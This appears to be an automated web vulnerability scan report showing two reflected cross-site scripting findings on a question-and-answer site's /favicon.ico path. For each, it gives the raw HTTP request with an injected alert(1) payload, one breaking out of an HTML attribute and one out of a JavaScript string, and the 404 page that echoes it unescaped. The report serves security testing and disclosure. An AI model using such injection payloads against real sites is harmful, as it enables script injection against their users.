1. Cross-site scripting (reflected)
1.1. http://www.blurtit.com/favicon.ico [REST URL parameter 1]
1.2. http://www.blurtit.com/favicon.ico [REST URL parameter 1]
Severity: | High |
Confidence: | Certain |
Host: | http://www.blurtit.com |
Path: | /favicon.ico |
GET /favicon.icoab6c3"><script>alert(1)< Host: www.blurtit.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=6u8h77cgs6 |
HTTP/1.1 404 Not Found Date: Sat, 12 Mar 2011 13:50:47 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Sat, 12 Mar 2011 13:50:47 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Vary: Accept-Encoding,User Content-Type: text/html; charset=UTF-8 Content-Length: 16028 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>404 Error Page - Blurtit</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="description" content="Ask questions, find answers and share your knowledge with users from around the world. Blurtit is the online community that has all the answers!" /> <meta name="robots" content="noodp" /> <meta property="fb:app_id" content="110555434708" /> <script type="text/javascript" <script type="text/javascript"> var blurtit_fb = new Object(); blurtit_fb.apiKey = "7796c39cf3795b4d879 </script> <script language="JavaScript" type="text/javascript" src="http://script1 <script language="JavaScript" type="text/javascript" src="http://script1 <link rel="search" type="application <link rel="alternate" type="application/rss+xml <link rel="stylesheet" type="text/css" href="http://css1.blurtit <!--[if IE 7]><link rel="stylesheet" type="text/css" href="http://css1.blurtit <!--[if IE 6]><link rel="stylesheet" type="text/css" href="http://css1.blurtit <script type="text/javascript" <!--[if lt IE 7]><script type="text/javascript">is <style type="text/css" media="screen"> div.question_remote_user span.date_created { color:#4d4d4d; font-size:0.6em; } #content { float:left; } body#blurtit-qa #content, body#blurtit-zone #content { min-height:780px; } </style> <!--[if IE 6]><style type="text/css" media="screen"> </style><![endif]--> <script type="text/javascript" charset="utf-8"> var googAds = new Object; googAds.hints = ''; var resource = ''; </script> </head> <body id="blurtit-zone"> <script src="http://static.ak <!-- FEED ID 4894 --> <script type="text/javascript" charset="utf-8"> function search_menu() { $('#search').focus $(this).css('color','#000 }); $('#search').blur $(this).css('color',' }); msg=''; if(!$('#search').attr( $('#search').attr("value" } } $(function() { search_menu(); $('#searchform').submit if($('#searchform #search').attr('value') == 'Enter your question…') { $('#searchform #search').attr('value','' }); }); </script> <div id="header_wrapper"> <div id="header"> <div id="metaNav"> <div class="left"> <a href="http://www.blurtit <a href="http://www.blurtit <a href="http://www.blurtit </div> <div class="right"> <a href="http://search <a href="http://www.blurtit <a href="http://www.blurtit </div> </div> <a href="http://www.blurtit <div id="askForm" class="right"> <form id="searchform" name="searchform" method="post" action="/ask.php"> <input type="hidden" name="e" value="h"/> <input type="hidden" name="sid" value="6u8h77cgs6vjb <input type="hidden" id="rt_search" name="rt" value="all" /> <input type="text" id="search" name="query" value="Enter a Question or Search…" onfocus="javascript:if <input class="askBtn" type="submit" value="" /> </form> </div> </div> </div> <ul class="category_list"> <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li class="last"><a href="http://www.blurtit </ul> <script type="text/javascript" charset="utf-8"> $(function() { var position = $('div#header #metaNav a.categories_drop') $('ul.category_list').css $('div#header #metaNav a.categories_drop').click var cat_list = $('ul.category_list'); if(cat_list.is(':hidden') cat_list.show(); else cat_list.hide(); return false; }); $('body').click(function( $('ul.category_list') }); }); function header_login() { $(function(){ headerdivid = 'div#askForm'; if($('div#header_login') $('div#mainNav, div#askForm').css( if($('a#logo').is(' $('a#logo').fadeIn(500); $('div#header a#header_login_link') $('.search_head_forgot') document.getElementById( //$('#searchform').hide() }else{ $('div#header_login').css $('.search_head_forgot') $('div#header a#header_login_link') //$('#searchform').fadeIn } }); } </script> <!--[if lt IE 7.]> <script type="text/javascript" charset="utf-8"> $(function() { $('#logo').supersleight() }); </script> <![endif]--> <div id="wrap"> <div class="content_top">  <div class="box relative" id="entice" style="margin:0"><a href="/" class="first"><em> < <span>404 Error Page</span> </div><style type="text/css"> div#content { padding:10px 15px;width:930px; } #goog-wm ul li { list-style:decimal;margin #goog-wm ul li.search-goog form { margin:5px 0; } #goog-wm ul li.search-goog form input#goog-wm-qt { font-size:2em;padding:5px #goog-wm ul li.search-goog form input#goog-wm-sb { margin-left:10px; background:transparent url('/css/common/button border:0; color:#696969; height:40px; font-size:1.25em; font-weight:bold; padding:1px 5px 4px 5px; text-align:center; width:241px; } #goog-wm ul li.search-goog form input#goog-wm-sb:hover { background:transparent url('/css/common/button cursor:pointer; } </style> <div id="content"> <h1>404 Error: Page Not Found</h1> <p>The Page you were looking for could not be found.</p> <script type="text/javascript"> var GOOG_FIXURL_LANG = 'en'; var GOOG_FIXURL_SITE = 'http://www.blurtit.com/' </script> <script type="text/javascript" src="http://linkhelp <div class="clear_both"> </div> <div class="content_bottom"> <div class="content_top"></div <div class="footerSitemap"> <div class="fColumn"> <h2>Blurtit Site Links</h2> <ul class="fSiteLinks"> <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="/search/">Search</a <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit </ul> <h2>Blurtit Legal</h2> <ul class="fTools"> <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit </ul> </div> <div class="fColumn"> <h2>About Blurtit</h2> <ul class="fAbout"> <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit </ul> <h2>Blurtit Help</h2> <ul class="fHelp"> <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit </ul> </div> <div class="fColumn"> <h2>Using Blurtit</h2> <ul class="fHelp"> <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit </ul> <h2>Blurtit Tools</h2> <ul class="fTools"> <li><a href="http://www.blurtit <li><a href="http://search <li><a href="http://twitter.com <li><a href="http://feeds2 <li><a href="http://feeds2 <li><a href="http://www.facebook </ul> </div> <div class="fColumn last"> <div class="atBlurtit"> <h2>Ask a Question via Twitter</h2> <p class="block_grey">Send a question to <a href="http://twitter.com/ </div> <div class="blurtitStore"> <h2>Blurtit Store</h2> <p class="block_grey">Get T-shirts, hoodies, caps and more at the <a href="http://www.zazzle </div> <h2>Blurtit International</h2> <ul class="fInternational"> <li><a href="http://jp.blurtit <li><a href="http://cn.blurtit </ul> </div> <div class="clearLeft" style="height:5px;"></div </div> <div class="content_bottom">< <p class="copyrightFooter" style="display:inline <p class="copyrightFooter alignRight" style="display:inline </div> <!-- adside --><script type="text/javascript" <!-- Start Quantcast tag --> <script type="text/javascript"> _qoptions={ qacct:"p-d5EoD6mobyvmM" }; </script> <script type="text/javascript" src="http://edge <noscript> <img src="http://pixel </noscript> <!-- End Quantcast tag --> <script type="text/javascript"> var _sf_async_config={uid (function(){ function loadChartbeat() { window._sf_endpt=(new Date()).getTime(); var e = document.createElement( e.setAttribute('language' e.setAttribute('type', 'text/javascript'); e.setAttribute('src', (("https:" == document.location "static.chartbeat.com/js document.body.appendChild } var oldonload = window.onload; window.onload = (typeof window.onload != 'function') ? loadChartbeat : function() { oldonload(); loadChartbeat(); }; })(); </script> <div id="overlay"></div> <div id="pop_up" class="pop_up box" style="display:none;"> <div class="head">Friendship Request</div> <div class="content"> <table> <tr> <td class="pop_up_content">< </tr> </table> </div> </div> <div id="medium_modal"></div> <div id="small_modal" script="/zone.php" ></div> <div id="large_modal" script="/zone.php" return="/favicon.icoab6c3"><script>alert(1)< <script language="JavaScript" type="text/javascript"> <!-- function addEngine(name,ext,cat){ if ((typeof window.sidebar == "object") && (typeof window.sidebar.addSe window.sidebar.addSe "http://www.blurtit.com "http://www.blurtit.com name,cat); } else{ errorMsg(name,ext,cat); } } var currentPage = '/favicon.icoab6c3"> //--> </script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location document.write(unescape(" </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA pageTracker._setCustomVar pageTracker._trackPa } catch(err) {} </script> </body> </html> |
Severity: | High |
Confidence: | Certain |
Host: | http://www.blurtit.com |
Path: | /favicon.ico |
GET /favicon.icocf11e'-alert(1)- Host: www.blurtit.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=6u8h77cgs6 |
HTTP/1.1 404 Not Found Date: Sat, 12 Mar 2011 13:50:50 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Sat, 12 Mar 2011 13:50:50 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Vary: Accept-Encoding,User Content-Type: text/html; charset=UTF-8 Content-Length: 15998 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>404 Error Page - Blurtit</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="description" content="Ask questions, find answers and share your knowledge with users from around the world. Blurtit is the online community that has all the answers!" /> <meta name="robots" content="noodp" /> <meta property="fb:app_id" content="110555434708" /> <script type="text/javascript" <script type="text/javascript"> var blurtit_fb = new Object(); blurtit_fb.apiKey = "7796c39cf3795b4d879 </script> <script language="JavaScript" type="text/javascript" src="http://script1 <script language="JavaScript" type="text/javascript" src="http://script1 <link rel="search" type="application <link rel="alternate" type="application/rss+xml <link rel="stylesheet" type="text/css" href="http://css1.blurtit <!--[if IE 7]><link rel="stylesheet" type="text/css" href="http://css1.blurtit <!--[if IE 6]><link rel="stylesheet" type="text/css" href="http://css1.blurtit <script type="text/javascript" <!--[if lt IE 7]><script type="text/javascript">is <style type="text/css" media="screen"> div.question_remote_user span.date_created { color:#4d4d4d; font-size:0.6em; } #content { float:left; } body#blurtit-qa #content, body#blurtit-zone #content { min-height:780px; } </style> <!--[if IE 6]><style type="text/css" media="screen"> </style><![endif]--> <script type="text/javascript" charset="utf-8"> var googAds = new Object; googAds.hints = ''; var resource = ''; </script> </head> <body id="blurtit-zone"> <script src="http://static.ak <!-- FEED ID 4894 --> <script type="text/javascript" charset="utf-8"> function search_menu() { $('#search').focus $(this).css('color','#000 }); $('#search').blur $(this).css('color',' }); msg=''; if(!$('#search').attr( $('#search').attr("value" } } $(function() { search_menu(); $('#searchform').submit if($('#searchform #search').attr('value') == 'Enter your question…') { $('#searchform #search').attr('value','' }); }); </script> <div id="header_wrapper"> <div id="header"> <div id="metaNav"> <div class="left"> <a href="http://www.blurtit <a href="http://www.blurtit <a href="http://www.blurtit </div> <div class="right"> <a href="http://search <a href="http://www.blurtit <a href="http://www.blurtit </div> </div> <a href="http://www.blurtit <div id="askForm" class="right"> <form id="searchform" name="searchform" method="post" action="/ask.php"> <input type="hidden" name="e" value="h"/> <input type="hidden" name="sid" value="6u8h77cgs6vjb <input type="hidden" id="rt_search" name="rt" value="all" /> <input type="text" id="search" name="query" value="Enter a Question or Search…" onfocus="javascript:if <input class="askBtn" type="submit" value="" /> </form> </div> </div> </div> <ul class="category_list"> <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li class="last"><a href="http://www.blurtit </ul> <script type="text/javascript" charset="utf-8"> $(function() { var position = $('div#header #metaNav a.categories_drop') $('ul.category_list').css $('div#header #metaNav a.categories_drop').click var cat_list = $('ul.category_list'); if(cat_list.is(':hidden') cat_list.show(); else cat_list.hide(); return false; }); $('body').click(function( $('ul.category_list') }); }); function header_login() { $(function(){ headerdivid = 'div#askForm'; if($('div#header_login') $('div#mainNav, div#askForm').css( if($('a#logo').is(' $('a#logo').fadeIn(500); $('div#header a#header_login_link') $('.search_head_forgot') document.getElementById( //$('#searchform').hide() }else{ $('div#header_login').css $('.search_head_forgot') $('div#header a#header_login_link') //$('#searchform').fadeIn } }); } </script> <!--[if lt IE 7.]> <script type="text/javascript" charset="utf-8"> $(function() { $('#logo').supersleight() }); </script> <![endif]--> <div id="wrap"> <div class="content_top">  <div class="box relative" id="entice" style="margin:0"><a href="/" class="first"><em> < <span>404 Error Page</span> </div><style type="text/css"> div#content { padding:10px 15px;width:930px; } #goog-wm ul li { list-style:decimal;margin #goog-wm ul li.search-goog form { margin:5px 0; } #goog-wm ul li.search-goog form input#goog-wm-qt { font-size:2em;padding:5px #goog-wm ul li.search-goog form input#goog-wm-sb { margin-left:10px; background:transparent url('/css/common/button border:0; color:#696969; height:40px; font-size:1.25em; font-weight:bold; padding:1px 5px 4px 5px; text-align:center; width:241px; } #goog-wm ul li.search-goog form input#goog-wm-sb:hover { background:transparent url('/css/common/button cursor:pointer; } </style> <div id="content"> <h1>404 Error: Page Not Found</h1> <p>The Page you were looking for could not be found.</p> <script type="text/javascript"> var GOOG_FIXURL_LANG = 'en'; var GOOG_FIXURL_SITE = 'http://www.blurtit.com/' </script> <script type="text/javascript" src="http://linkhelp <div class="clear_both"> </div> <div class="content_bottom"> <div class="content_top"></div <div class="footerSitemap"> <div class="fColumn"> <h2>Blurtit Site Links</h2> <ul class="fSiteLinks"> <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="/search/">Search</a <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit </ul> <h2>Blurtit Legal</h2> <ul class="fTools"> <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit </ul> </div> <div class="fColumn"> <h2>About Blurtit</h2> <ul class="fAbout"> <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit </ul> <h2>Blurtit Help</h2> <ul class="fHelp"> <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit </ul> </div> <div class="fColumn"> <h2>Using Blurtit</h2> <ul class="fHelp"> <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit <li><a href="http://www.blurtit </ul> <h2>Blurtit Tools</h2> <ul class="fTools"> <li><a href="http://www.blurtit <li><a href="http://search <li><a href="http://twitter.com <li><a href="http://feeds2 <li><a href="http://feeds2 <li><a href="http://www.facebook </ul> </div> <div class="fColumn last"> <div class="atBlurtit"> <h2>Ask a Question via Twitter</h2> <p class="block_grey">Send a question to <a href="http://twitter.com/ </div> <div class="blurtitStore"> <h2>Blurtit Store</h2> <p class="block_grey">Get T-shirts, hoodies, caps and more at the <a href="http://www.zazzle </div> <h2>Blurtit International</h2> <ul class="fInternational"> <li><a href="http://jp.blurtit <li><a href="http://cn.blurtit </ul> </div> <div class="clearLeft" style="height:5px;"></div </div> <div class="content_bottom">< <p class="copyrightFooter" style="display:inline <p class="copyrightFooter alignRight" style="display:inline </div> <!-- adside --><script type="text/javascript" <!-- Start Quantcast tag --> <script type="text/javascript"> _qoptions={ qacct:"p-d5EoD6mobyvmM" }; </script> <script type="text/javascript" src="http://edge <noscript> <img src="http://pixel </noscript> <!-- End Quantcast tag --> <script type="text/javascript"> var _sf_async_config={uid (function(){ function loadChartbeat() { window._sf_endpt=(new Date()).getTime(); var e = document.createElement( e.setAttribute('language' e.setAttribute('type', 'text/javascript'); e.setAttribute('src', (("https:" == document.location "static.chartbeat.com/js document.body.appendChild } var oldonload = window.onload; window.onload = (typeof window.onload != 'function') ? loadChartbeat : function() { oldonload(); loadChartbeat(); }; })(); </script> <div id="overlay"></div> <div id="pop_up" class="pop_up box" style="display:none;"> <div class="head">Friendship Request</div> <div class="content"> <table> <tr> <td class="pop_up_content">< </tr> </table> </div> </div> <div id="medium_modal"></div> <div id="small_modal" script="/zone.php" ></div> <div id="large_modal" script="/zone.php" return="/favicon.icocf11e <script language="JavaScript" type="text/javascript"> <!-- function addEngine(name,ext,cat){ if ((typeof window.sidebar == "object") && (typeof window.sidebar.addSe window.sidebar.addSe "http://www.blurtit.com "http://www.blurtit.com name,cat); } else{ errorMsg(name,ext,cat); } } var currentPage = '/favicon.icocf11e'-alert(1)- //--> </script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location document.write(unescape(" </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA pageTracker._setCustomVar pageTracker._trackPa } catch(err) {} </script> </body> </html> |